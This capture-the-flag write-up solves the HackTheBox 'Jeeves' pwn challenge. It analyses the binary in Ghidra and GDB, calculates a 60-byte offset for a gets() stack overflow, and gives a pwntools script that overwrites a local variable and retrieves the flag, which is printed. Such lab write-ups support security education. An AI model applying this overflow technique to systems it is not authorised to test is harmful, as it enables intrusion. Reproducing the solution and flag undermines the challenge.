Hackthebox Jeeves Pwn Challenge

Jeeves is a HackTheBox (binary) Pwn challenge, and is now retired. It’s an easy challenge:

When we connect to the server, we see nothing until we enter input: (Note: The address and port differ between the image above and the nc command below because I stopped and restarted the server while writing this post.)

$ nc 30861
Hello, good sir!
May I have your name? Hello AAAA, hope you have a good day!

Now lets take a look at the file information:

$ file jeeves
jeeves: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=18c31354ce48c8d63267a9a807f1799988af27bf, for GNU/Linux 3.2.0, not stripped

Let’s take a look at a dump of the code using objdump. We see that main() doesn’t call any functions other than those in libc. Right away I notice at 11f5 that 0xdeadc0d3 is copied to rbp-0x4. This looks like a variable. Further down, another hex string 0x1337bab3 is compared to that same address.

Let’s take a look using Ghidra. In Ghidra, you can see that local_c is set to the value “0xdeadc0d3”. Then the user is prompted to enter their name. Next, local_c is compared to the value 0x1337bab3. If the comparison is true, it opens flag.txt and prints the contents.

The next thing to do is to create a local file, flag.txt where I place the contents “fl@g”. Now lets open the jeeves file using GDB. Using the checksec command, you can see that there is no stack canary, and NX is enabled which means that the stack is not executable.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED

Next, enter ‘disas main’ and find the address right after the gets@plt call and set a breakpoint there.

gdb-peda$ disas main
Dump of assembler code for function main:
   0x00000000000011e9 <+0>:	endbr64 
   0x00000000000011ed <+4>:	push   rbp
   0x00000000000011ee <+5>:	mov    rbp,rsp
   0x00000000000011f1 <+8>:	sub    rsp,0x40
   0x00000000000011f5 <+12>:	mov    DWORD PTR [rbp-0x4],0xdeadc0d3
   0x00000000000011fc <+19>:	lea    rdi,[rip+0xe05]        # 0x2008
   0x0000000000001203 <+26>:	mov    eax,0x0
   0x0000000000001208 <+31>:	call   0x10a0 <printf@plt>
   0x000000000000120d <+36>:	lea    rax,[rbp-0x40]
   0x0000000000001211 <+40>:	mov    rdi,rax
   0x0000000000001214 <+43>:	mov    eax,0x0
   0x0000000000001219 <+48>:	call   0x10d0 <gets@plt>
   0x000000000000121e <+53>:	lea    rax,[rbp-0x40]
   0x0000000000001222 <+57>:	mov    rsi,rax
   0x0000000000001225 <+60>:	lea    rdi,[rip+0xe04]        # 0x2030
   0x000000000000122c <+67>:	mov    eax,0x0
   0x0000000000001231 <+72>:	call   0x10a0 <printf@plt>
   0x0000000000001236 <+77>:	cmp    DWORD PTR [rbp-0x4],0x1337bab3
   0x000000000000123d <+84>:	jne    0x12a8 <main+191>
   0x000000000000123f <+86>:	mov    edi,0x100
   0x0000000000001244 <+91>:	call   0x10e0 <malloc@plt>
   0x0000000000001249 <+96>:	mov    QWORD PTR [rbp-0x10],rax
   0x000000000000124d <+100>:	mov    esi,0x0
   0x0000000000001252 <+105>:	lea    rdi,[rip+0xdfc]        # 0x2055
   0x0000000000001259 <+112>:	mov    eax,0x0
   0x000000000000125e <+117>:	call   0x10f0 <open@plt>
   0x0000000000001263 <+122>:	mov    DWORD PTR [rbp-0x14],eax
   0x0000000000001266 <+125>:	mov    rcx,QWORD PTR [rbp-0x10]
   0x000000000000126a <+129>:	mov    eax,DWORD PTR [rbp-0x14]
   0x000000000000126d <+132>:	mov    edx,0x100
   0x0000000000001272 <+137>:	mov    rsi,rcx
   0x0000000000001275 <+140>:	mov    edi,eax
   0x0000000000001277 <+142>:	mov    eax,0x0
   0x000000000000127c <+147>:	call   0x10c0 <read@plt>
   0x0000000000001281 <+152>:	mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000001285 <+156>:	mov    rsi,rax
   0x0000000000001288 <+159>:	lea    rdi,[rip+0xdd1]        # 0x2060
   0x000000000000128f <+166>:	mov    eax,0x0
   0x0000000000001294 <+171>:	call   0x10a0 <printf@plt>
   0x0000000000001299 <+176>:	mov    eax,DWORD PTR [rbp-0x14]
   0x000000000000129c <+179>:	mov    edi,eax
   0x000000000000129e <+181>:	mov    eax,0x0
   0x00000000000012a3 <+186>:	call   0x10b0 <close@plt>
   0x00000000000012a8 <+191>:	mov    eax,0x0
   0x00000000000012ad <+196>:	leave  
   0x00000000000012ae <+197>:	ret    
End of assembler dump.
gdb-peda$ b *0x000000000000121e
Breakpoint 1 at 0x121e

I got an error when trying to insert a breakpoint. I assume that this is because the file has been stripped of symbols. Instead, let’s break at the program entry point, _start.

gdb-peda$ b _start
Breakpoint 3 at 0x555555555100
gdb-peda$ run
Starting program: /home/kali/Downloads/htb-jeeves/jeeves

Now lets enter ‘disas main’ again and find that address and set a breakpoint.

gdb-peda$ b *0x000055555555521e
Breakpoint 4 at 0x55555555521e
gdb-peda$ c
Hello, good sir!
May I have your name? AAAA

After entering ‘c’ to continue we hit our next breakpoint. Now let’s dump the stack and take a look. Note that I used ‘x/20xw’ which means to examine 20 hex words, or 4 bytes (32 bits). Although the output of the file command above said this is a 64 bit file and in 64 bit we would normally enter ‘x/20xg’ to display in groups of 8 bytes, it’s easier to count stack addresses when printing in groups of 4 bytes. In the stack, we find our payload “AAAA” as 0x41414141 (A is 41 in hex), and further down the stack we see our variable, 0xdeadc0d3 which we need to overwrite to get the flag.

Breakpoint 4, 0x000055555555521e in main ()
gdb-peda$ x/20xw $rsp
0x7fffffffde60:	0x41414141	0x00007f00	0x555552fd	0x00005555
0x7fffffffde70:	0x00000000	0x00000000	0x00000000	0x00000000
0x7fffffffde80:	0x555552b0	0x00005555	0x55555100	0x00005555
0x7fffffffde90:	0xffffdf90	0x00007fff	0x00000000	0xdeadc0d3
0x7fffffffdea0:	0x555552b0	0x00005555	0xf7e13d0a	0x00007fff

First we need to find the address where 0xdeadc0d3 starts. To the left of that row, find the address. Then count over until you reach that hex value. Remember that on x86 we’re storing data in little endian format, so you need to count starting on the right end (least significant bit) and count right to left. Every two hex bits counts as one byte.

0x7fffffffde90:	0xffffdf90	0x00007fff	0x00000000	0xdeadc0d3

Above, you see the starting address which ends in 0 (0x7fffffffde90). So in the first hex word, 0xffffdf90, 90 is 0, df is 1, ff is 2, and ff is 3. Then go to the next hex word and continue counting from right to left. Finally, we find that the address of 0xdeadc0d3 is at 0x7fffffffde9c. Now we need to count the bytes from the beginning of our A’s payload up to the start of the value we need to overwrite (0xdeadc0d3). An easy way to do this is to use gdb as a calculator:

gdb-peda$ p/u 0x7fffffffde9c - 0x7fffffffde60
$1 = 60

As you can see, we need a payload of 60 bytes, plus the value 0x1337bab3. Remember that in little-endian format, we must send the address backwards as ‘\xb3\xba\x37\x13’. In the script below, I use p64 from pwntools to do that for me. Let’s manually enter our payload locally first and see it works to read our local flag.

$ python3         
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> payload = b'A' * 60
>>> payload += p64(0x1337bab3)
>>> f = open('data.tmp', 'wb')
>>> f.write(payload)
>>> f.close()

Contents of data.tmp:

$ cat data.tmp                                    

Now we send data.tmp as input to the program locally:

$ ./jeeves < data.tmp                      
Hello, good sir!
Pleased to make your acquaintance. Here's a small gift: fl@g

Remember, earlier I had created a local flag.txt file with the same contents.

Let’s use pwntools to solve this. I placed plenty of comments in the code to explain how it works.

$ cat solve.py                                    
#!/usr/bin/env python3
from pwn import * # import pwntools
payload = b'A' * 60 # our 60 byte buffer
payload += p64(0x1337bab3) # Remember we need to send this value in little endian format, and p64 from pwntools does this for us.
conn = remote("", 30861) # connect to the server host and port
conn.sendline(payload) # send our payload
#conn.interactive() # receive the rest of the output.

Finally, lets run solve.py and get the flag:

$ python3 solve.py
[+] Opening connection to on port 30861: Done
b"Hello, good sir!\nMay I have your name? Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb3\xba7\x13, hope you have a good day!\nPleased to make your acquaintance. Here's a small gift: HTB{w3lc0me_t0_lAnd_0f_pwn_&_pa1n!}\n"
[*] Closed connection to port 30861

In the output, we see our flag: HTB{w3lc0me_t0lAnd_0f_pwn&_pa1n!}

Written on August 28, 2021